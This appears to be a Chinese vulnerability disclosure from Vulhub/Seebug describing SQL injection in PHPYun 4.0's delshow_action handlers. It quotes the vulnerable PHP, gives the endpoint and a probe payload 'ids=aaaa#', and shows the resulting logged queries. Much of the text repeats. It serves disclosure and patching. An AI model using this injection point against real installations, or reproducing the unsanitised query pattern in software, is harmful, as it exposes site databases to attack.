VULHUB ™

### 简要描述： PHP云人才系统 phpyun v4.0正式版 build20150819 4.0已经重新改版了，别在用3.2和4.0比较 ### 详细说明： 第一处出现在 /member/com/model/show.class.php中 3.2版本的源码是 ``` function delshow_action(){ $company_show=$this->obj->DB_select_all("company_show","`id` in (".$_POST['ids'].") and `uid`='".$this->uid."'","`picurl`"); if(is_array($company_show)&&$company_show){ foreach($company_show as $val){ $this->obj->unlink_pic(".".$val['picurl']); } $this->obj->DB_delete_all("company_show","`id` in (".$_POST['ids'].") and `uid`='".$this->uid."'",""); } return true; } ``` 以下是4.0的 ``` function delshow_action(){ $ids=$_POST['ids']; $company_show=$this->obj->DB_select_all("company_show","`id` in (".$ids.") and `uid`='".$this->uid."'","`picurl`"); if(is_array($company_show)&&$company_show){ foreach($company_show as $val){ unlink_pic(".".$val['picurl']); } $this->obj->DB_delete_all("company_show","`id` in (".$ids.") and `uid`='".$this->uid."'",""); $this->obj->member_log("删除企业环境展示"); } return true; ``` POST来的值直接带入查询，没有单引号，所以可以注入...

### 简要描述： PHP云人才系统 phpyun v4.0正式版 build20150819 4.0已经重新改版了，别在用3.2和4.0比较 ### 详细说明： 第一处出现在 /member/com/model/show.class.php中 3.2版本的源码是 ``` function delshow_action(){ $company_show=$this->obj->DB_select_all("company_show","`id` in (".$_POST['ids'].") and `uid`='".$this->uid."'","`picurl`"); if(is_array($company_show)&&$company_show){ foreach($company_show as $val){ $this->obj->unlink_pic(".".$val['picurl']); } $this->obj->DB_delete_all("company_show","`id` in (".$_POST['ids'].") and `uid`='".$this->uid."'",""); } return true; } ``` 以下是4.0的 ``` function delshow_action(){ $ids=$_POST['ids']; $company_show=$this->obj->DB_select_all("company_show","`id` in (".$ids.") and `uid`='".$this->uid."'","`picurl`"); if(is_array($company_show)&&$company_show){ foreach($company_show as $val){ unlink_pic(".".$val['picurl']); } $this->obj->DB_delete_all("company_show","`id` in (".$ids.") and `uid`='".$this->uid."'",""); $this->obj->member_log("删除企业环境展示"); } return true; ``` POST来的值直接带入查询，没有单引号，所以可以注入 试试带入字符看看是否可以 url ``` http://127.0.0.1/phpyun/member/index.php?c=show&act=delshow ``` postdata ``` ids=aaaa# ``` [<img src="https://images.seebug.org/upload/201510/01141532ea390efd98e7951fcacebf04ff00afd4.png" alt="QQ截图20151001141515.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/01141532ea390efd98e7951fcacebf04ff00afd4.png) 成功带入 ``` 2015/10/1 14:14SELECT `picurl` FROM `phpyun_company_show` WHERE `id` in (aaaa#) and `uid`='1' ``` 第二处出现在/member/user/model/show.class.php中 第二处改的比较明显 3.2是用GET方法获取del参数 但是4.0改用了POST的方法获取，但是没有过滤 3.2的 ``` $delid=$_GET['del'];//GET的del没有过滤，传给delid ``` 4.0的 ``` $ids=$_POST['ids'] ``` 以下是3.2源码 ``` function job(){ 。。。 570行if($_GET['del'] || is_array($_POST['checkboxid'])) { if(is_array($_POST['checkboxid'])){ $layer_type=1; $delid=$this->pylode(",",$_POST['checkboxid']); }else if($_GET['del']){ $layer_type=0; $delid=$_GET['del'];//GET的del没有过滤，传给delid } $rows=$this->obj->DB_select_all("company_job","`uid`='".$this->uid."' and `id` in (".$delid.")","`state`"); $nid=$this->obj->DB_delete_all("company_job","`uid`='".$this->uid."' and `id` in (".$delid.")"," "); echo $nid; $this->obj->DB_delete_all("company_job_link","`uid`='".$this->uid."' and `jobid` in (".$delid.")"," "); 。。。 } ``` 以下是4.0的 ``` function delshow_action(){ $ids=$_POST['ids']; $resume_show=$this->obj->DB_select_all("resume_show","`id` in (".$ids.") and `uid`='".$this->uid."'","`picurl`"); if(is_array($resume_show)&&$resume_show){ foreach($resume_show as $val){ unlink_pic(".".$val['picurl']); } $this->obj->DB_delete_all("resume_show","`id` in (".$ids.") and `uid`='".$this->uid."'",""); $this->obj->member_log("删除作品案例"); } return true; ``` POST来的值直接带入查询，没有单引号，所以可以注入 试试带入字符看看是否可以 url ``` http://127.0.0.1/phpyun/member/index.php?c=show&act=delshow ``` postdata ``` ids=aaaa# ``` [<img src="https://images.seebug.org/upload/201510/011358459b233ddb67932936d5ecfaff601ca38d.png" alt="QQ截图20151001135656.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/011358459b233ddb67932936d5ecfaff601ca38d.png) 可以看到成功带入 ``` 2015/10/1 13:56SELECT `picurl` FROM `phpyun_resume_show` WHERE `id` in (aaaa#) and `uid`='2' ``` ### 漏洞证明： 第一处出现在 /member/com/model/show.class.php中 3.2版本的源码是 ``` function delshow_action(){ $company_show=$this->obj->DB_select_all("company_show","`id` in (".$_POST['ids'].") and `uid`='".$this->uid."'","`picurl`"); if(is_array($company_show)&&$company_show){ foreach($company_show as $val){ $this->obj->unlink_pic(".".$val['picurl']); } $this->obj->DB_delete_all("company_show","`id` in (".$_POST['ids'].") and `uid`='".$this->uid."'",""); } return true; } ``` 以下是4.0的 ``` function delshow_action(){ $ids=$_POST['ids']; $company_show=$this->obj->DB_select_all("company_show","`id` in (".$ids.") and `uid`='".$this->uid."'","`picurl`"); if(is_array($company_show)&&$company_show){ foreach($company_show as $val){ unlink_pic(".".$val['picurl']); } $this->obj->DB_delete_all("company_show","`id` in (".$ids.") and `uid`='".$this->uid."'",""); $this->obj->member_log("删除企业环境展示"); } return true; ``` POST来的值直接带入查询，没有单引号，所以可以注入 试试带入字符看看是否可以 url ``` http://127.0.0.1/phpyun/member/index.php?c=show&act=delshow ``` postdata ``` ids=aaaa# ``` [<img src="https://images.seebug.org/upload/201510/01141532ea390efd98e7951fcacebf04ff00afd4.png" alt="QQ截图20151001141515.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/01141532ea390efd98e7951fcacebf04ff00afd4.png) 成功带入 ``` 2015/10/1 14:14SELECT `picurl` FROM `phpyun_company_show` WHERE `id` in (aaaa#) and `uid`='1' ``` 第二处出现在/member/user/model/show.class.php中 第二处改的比较明显 3.2是用GET方法获取del参数 但是4.0改用了POST的方法获取，但是没有过滤 3.2的 ``` $delid=$_GET['del'];//GET的del没有过滤，传给delid ``` 4.0的 ``` $ids=$_POST['ids'] ``` 以下是3.2源码 ``` function job(){ 。。。 570行if($_GET['del'] || is_array($_POST['checkboxid'])) { if(is_array($_POST['checkboxid'])){ $layer_type=1; $delid=$this->pylode(",",$_POST['checkboxid']); }else if($_GET['del']){ $layer_type=0; $delid=$_GET['del'];//GET的del没有过滤，传给delid } $rows=$this->obj->DB_select_all("company_job","`uid`='".$this->uid."' and `id` in (".$delid.")","`state`"); $nid=$this->obj->DB_delete_all("company_job","`uid`='".$this->uid."' and `id` in (".$delid.")"," "); echo $nid; $this->obj->DB_delete_all("company_job_link","`uid`='".$this->uid."' and `jobid` in (".$delid.")"," "); 。。。 } ``` 以下是4.0的 ``` function delshow_action(){ $ids=$_POST['ids']; $resume_show=$this->obj->DB_select_all("resume_show","`id` in (".$ids.") and `uid`='".$this->uid."'","`picurl`"); if(is_array($resume_show)&&$resume_show){ foreach($resume_show as $val){ unlink_pic(".".$val['picurl']); } $this->obj->DB_delete_all("resume_show","`id` in (".$ids.") and `uid`='".$this->uid."'",""); $this->obj->member_log("删除作品案例"); } return true; ``` POST来的值直接带入查询，没有单引号，所以可以注入 试试带入字符看看是否可以 url ``` http://127.0.0.1/phpyun/member/index.php?c=show&act=delshow ``` postdata ``` ids=aaaa# ``` [<img src="https://images.seebug.org/upload/201510/011358459b233ddb67932936d5ecfaff601ca38d.png" alt="QQ截图20151001135656.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/011358459b233ddb67932936d5ecfaff601ca38d.png) 可以看到成功带入 ``` 2015/10/1 13:56SELECT `picurl` FROM `phpyun_resume_show` WHERE `id` in (aaaa#) and `uid`='2' ```